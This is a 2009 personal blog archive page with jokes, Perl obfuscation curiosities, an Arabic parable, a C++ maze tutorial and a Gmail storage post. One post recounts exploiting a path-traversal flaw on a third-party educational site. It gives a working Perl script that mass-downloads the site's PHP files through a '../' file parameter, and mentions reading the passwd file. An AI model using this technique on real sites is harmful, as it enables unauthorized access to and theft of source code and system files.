Archive for February, 2009

A job interview!

Posted in General on February 26, 2009 by Xacker

Story I

E: Do u have a boyfriend?
C: I have.

E: Is he working Locally?
C: No. He is working Overseas.

E: Sorry, my company cannot employ u !
C: Why?

E: U will not be able to settle down here permanently. And my Company don’t want to pay extra expenses on the Overseas calls just because of u.

*********

Story II

E: Any girl friends?
C: No.

E: So far chased any before?
C: Have, but not successful.

E: Ever think of getting a job first then start looking for a girlfriend?
C: Career is first priority. Currently didn’t want to consider This personal issue.

E: Sorry, my company cannot employ u.
C: Why?

E: You are lacking of P.R skills and confidence!!

*********

Continue reading

A white peacock!

Posted in General on February 22, 2009 by Xacker

Amazing creature!

Even some cultures believe it brings good luck!

I need lots of goodluck this year, I hope this post helps 😛

Obfuscation

Posted in Programming, Security with tags , on February 19, 2009 by Xacker

You can obfuscate “XACKER” to stdout using different programming languages but .. it would still be recognizable don’t you think?

How about obfuscating it with Perl?

''=~('(?{'.('//)@*~'^'_]@.^^').'"'.('%!|`%}_'^'}`?+`/}').',$/})')

that’s it, I’m ‘con‘fuscated now 😮

Of course this is not the first time to be done.. I don’t mean obfuscating “XACKER” 😀 no, I mean obfuscation with Perl.. there has been since Perl existed alot of obfuscation contests, something like this, which prints “just another perl hacker”

$_ = "wftedskaebjgdpjgidbsmnjgc";
tr/a-z/oh, turtleneck Phrase Jar!/; print;

Simple? OK how about this (I swear it prints “just another perl hacker” !)

#!/usr/bin/perl
not exp log srand xor s qq qx xor
s x x length uc ord and print chr
ord for qw q join use sub tied qx
xor eval xor print qq q q xor int
eval lc q m cos and print chr ord
for qw y abs ne open tied hex exp
ref y m xor scalar srand print qq
q q xor int eval lc qq y sqrt cos
and print chr ord for qw x printf
each return local x y or print qq
s s and eval q s undef or oct xor
time xor ref print chr int ord lc
foreach qw y hex alarm chdir kill
exec return y s gt sin sort split

You still think it’s simple? try the ultimate JAPH:

                                                #
                                            sub j(\$){($
              P,$V)=                      @_;while($$P=~s:^
          ([()])::x){                    $V+=(‘(‘eq$1)?-32:31
    }$V+=ord(  substr(                 $$P,0,1,””))-74} sub a{
   my($I,$K,$  J,$L)=@_               ;$I=int($I*$M/$Z);$K=int(
  $K*$M/$Z);$J=int($J*$M             /$Z);$L=int($L*$M/$Z); $G=$
  J-$I;$F=$L-$K;$E=(abs($          G)>=abs($F))?$G:$F;($E<0) and($
   I,$K)=($J,$L);$E||=.01       ;for($i=0;$i< =abs$E;$i++ ){ $D->{$K
           +int($i*$F/$E)      }->{$I+int($i*$G/$E)}=1}}sub p{$D={};$
          Z=$z||.01;map{    $H=$_;$I=$N=j$H;$K=$O=j$H;while($H){$q=ord
         substr($H,0,1,”” );if(42==$q){$J=j$H;$L=j$H}else{$q-=43;$L =$q
       %9;$J=($q-$L)/9;$L=$q-9*$J-4;$J-=4}$J+=$I;$L+=$K;a($I,$K,$J,$ L);
       ($I,$K)=($J,$L)}a($I,$K,$N,$O)}@_;my$T;map{$y=$_;map{ $T.=$D->{$y}
       ->{$_}?$\:’ ‘}(-59..59);$T.=”\n”}(-23..23);print”\e[H$T”}$w= eval{
       require Win32::Console::ANSI};$b=$w?’1;7;’:””;($j,$u,$s,$t,$a,$n,$o
       ,$h,$c,$k,$p,$e,$r,$l,$C)=split/}/,’Tw*JSK8IAg*PJ[*J@wR}*JR]*QJ[*J’.
        ‘BA*JQK8I*JC}KUz]BAIJT]*QJ[R?-R[e]\RI’.’}Tn*JQ]wRAI*JDnR8QAU}wT8KT’.
        ‘]n*JEI*EJR*QJ]*JR*DJ@IQ[}*JSe*JD[n]*JPe*’.’JBI/KI}T8@?PcdnfgVCBRcP’.
         ‘?ABKV]]}*JWe*JD[n]*JPe*JC?8B*JE};Vq*OJQ/IP[‘.’wQ}*JWeOe{n*EERk8;’.
           ‘J*JC}/U*OJd[OI@*BJ*JXn*J>w]U}CWq*OJc8KJ?O[e]U/T*QJP?}*JSe*JCnTe’.
            ‘QIAKJR}*JV]wRAI*J?}T]*RJcJI[\]3;U]Uq*PM[wV]W]WCT*DM*SJ’.  ‘ZP[Z’.
               ‘PZa[\]UKVgogK9K*QJ[\]n[RI@*EH@IddR[Q[]T]T]T3o[dk*JE’.  ‘[Z\U’.
                 ‘{T]*JPKTKK]*OJ[QIO[PIQIO[[gUKU\k*JE+J+J5R5AI*EJ00’.  ‘BCB*’.
                      ‘DMKKJIR[Q+*EJ0*EK’;sub h{$\ = qw(% & @ x)[int    rand
                       4];map{printf  “\e[$b;%dm”,int(rand 6)+101-60*   ($w
                        ||0);system(  “cls”)if$w ;($A,$S)=    ($_[1],   $
                         _[0]);($M,   @,)= split  ‘}’;for(     $z=256
                         ;$z>0; $z   -=$S){$S*=   $A;p @,}      sleep$_
                         [2];while   ($_[3]&&($    z+=$ S)       <=256){                          p@,}}("".   "32}7D$j"     ."}AG".       "$u}OG"                          ."$s}WG"    ."$t",""      ."24}("        ."IJ$a"                          ."}1G$n"    ."}CO$o"     ."}GG$t"        ."}QC"                           ."$h}"      ."^G$e"    ."})IG"          ."$r",                           "32}?"       ."H$p}FG$e}QG$r".          "}ZC"                           ."$l",          "28}(LC" .""            ."".                           "$h}:"           ."J$a}EG".             "$c"                           ."}M"             ."C$k}ZG".            "$e"                           ."}"             ."dG$r","18"          ."}("                          ."D;"            ."$C"  )}{h(16         ,1,1,0                         );h(8,          .98,0,0   );h(16         ,1,1,1)                         ;h(8.0         ,0.98,0,     1);         redo}###                       #written                                 060204 by                     #liverpole                                  @@@@@@@                  #@@@@@@@@@@@ [/sourcecode]

Script source code disclosure could mean full compromising

Posted in Programming, Security with tags , , , on February 18, 2009 by Xacker

Hello,

I have been playing lately with some websites security since it was extremely bored for me after finishing my exams to have nothing better to do.. yeah I know I still got to finish the CCNA course and get over with that but call me lazy I’ve wasted alot of valuable time 😦

Never mind that for a second, what I bring to you today is a closer look on websites security and what could a simple human error do with your website.

Take for example our website today, http://vulnerable.edu.xx [Link kept private for.. well, I might have some black hat touch here but I still don’t want anyone to compromise the website for fun! as we all know, it was always for “educational purposes only” :D] — the website appeared to be vulnerable to Script source code disclosure which entitled me to have a copy of every single file on the website that appeared on my crawler, including the famous ‘passwd‘ file [unfortunately the passwords were kept encrypted in the ‘shadow‘ file 😦 — wasn’t hard to guess the path once I got the ability to get any file :)]

So with a fast dirty perl code I wrote on a rush (took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host 🙂

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (< handle >) { #remove the spaces between handle and <>, WP parser sucks
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while (@dir[$i]) {
        mkdir @dir[$i];
        chdir './'.@dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?'
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}
just an example, one of the folders :)

just an example, one of the folders 🙂

let’s hope it’s not your site 😀

تعلّم أن تبقي فمك مغلقاً أحياناً

Posted in General on February 17, 2009 by Xacker

تعلّم أن تبقي فمك مغلقاً أحياناً

يحكى أنّ ثلاثة أشخاص حكم عليهم بالإعدام بالمقصلة، وهم: عالم دين – محامي – فيزيائي

وعند لحظة الإعدام تقدّم عالم الدين ووضعوا رأسه تحت المقصلة، وسألوه: هل هناك كلمة أخيرة توّد قولها؟

فقال عالم الدين: الله .. الله .. الله .. هو من سينقذني

وعند ذلك أنزلوا المقصلة، فنزلت المقصلة وعندما وصلت لرأس عالم الدين توقفت

فتعجّب النّاس، وقالوا: أطلقوا سراح عالم الدين فقد قال الله كلمته. ونجا عالم الدين

وجاء دور المحامي إلى المقصلة

فسألوه: هل هناك كلمة أخيرة تودّ قولها؟

فقال: أنا لا أعرف الله كعالم الدين، ولكن أعرف أكثر عن العدالة، العدالة ..العدالة .. العدالة هي من سينقذني

ونزلت المقصلة على رأس المحامي، وعندما وصلت لرأسه توقفت

فتعجّب النّاس، وقالوا: أطلقوا سراح المحامي ، فقد قالت العدالة كلمتها. ونجا المحامي

وأخيراً جاء دور الفيزيائي

فسألوه: هل هناك كلمة أخيرة تودّ قولها؟

فقال: أنا لا أعرف الله كعالم الدين، ولا أعرف العدالة كالمحامي، ولكنّي أعرف أنّ هناك عقدة في حبل المقصلة تمنع المقصلة من النزول

فنظروا للمقصلة ووجدوا فعلاً عقدة تمنع المقصلة من النزول، فأصلحوا العقدة وأنزلوا المقصلة على رأس الفيزيائي وقطع رأسه

وهكذا من الأفضل أن تبقي فمك مقفلا أحيانا، حتى وإن كنت تعرف الحقيقة

Finding a path in a maze using C++

Posted in Programming with tags , , on February 9, 2009 by Xacker

How to solve a maze with C++ ?

The following picture represents a simple maze of 10*10 blocks. Note that our program will take a maximum of 40*40 dimensions for example, this picture is only to simplify your imagination process 🙂
The maze will be represented by a 2 dimensional array.

maze

Functions definitions:

  1. main() is the main program, that is used to call all other functions.
  2. setCoord() is an void type function, that takes 2 params, number of rows and cols of the the maze.
  3. fillMaze() is a void type function, that takes 3 params, a maze ptr, number of its rows and cols.
  4. valMaze() is an integer type function, that takes 5 params, a maze ptr, number of its rows and cols, an eNtry(x,y) ptr, an eXit(x,y) ptr.
  5. findPos() is an integer type function, that takes 5 params, a maze ptr, number of its rows and cols, (x,y) ptr, accum num.
  6. /* additional functions will be added later */

I’m gonna present the program as functions first then glue everything together at the end to avoid complixity.

I would like also to take this chance to thank the following people who have helped me a lot with this progress: خالد الشايع, TheNapsterBoy, علي الشمري, عمر العادل.

Caution: WordPress source code parser SUCKS, danger of falling asteroids! use helmets as precaution 😛

/*	gets the width and height of the maze
	checking for the allowed range */
void setCoord(int &nrows,int &ncols) {
	if (ncols < = 0 || ncols > 40) {
		printf ("Enter maze width: ");
		scanf_s  ("%d",&ncols);
	}
	if (nrows < = 0 || nrows > 40) {
		printf ("Enter maze height: ");
		scanf_s  ("%d",&nrows);
	}
	if (nrows < = 0 || nrows > 40 || ncols < = 0 || ncols > 40) {
		printf  ("Invalid width or height detected\n\n");
		setCoord(nrows,ncols);	// recursive call
	}
}

Continue reading

Turn your Gmail account into your backup drive!

Posted in General, Google with tags , , , , on February 5, 2009 by Xacker

You must have heard about Google’s project to provide storage services to users all around the world through its different and wide services, Google as promised launched this service back in 2007 with various storage plans starting with 6GB for $20 per year up to 250GB for $500 per year.

Basic storage doesn’t involve any of the described plans and is mostly for Gmail only, you can check your Gmail storage at the Google Shared Storage.

Continue reading